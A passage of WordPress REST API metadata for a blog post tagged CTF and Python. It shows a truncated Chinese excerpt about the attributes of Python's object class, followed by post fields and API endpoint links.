\u7c7b\u3002object \u7c7b\u4f9b\u4e86\u8bb8\u591a\u57fa\u7840\u529f\u80fd\uff0c\u4f8b\u5982 __class__\u3001__dir__\u3001__getat......","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[23],"tags":[9,31],"class_list":["post-277","post","type-post","status-publish","format-standard","hentry","category-web-security","tag-ctf","tag-python"],"_links":{"self":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=277"}],"version-history":[{"count":28,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/277\/revisions"}],"predecessor-version":[{"id":502,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/277\/revisions\/502"}],"wp:attachment":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=277"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}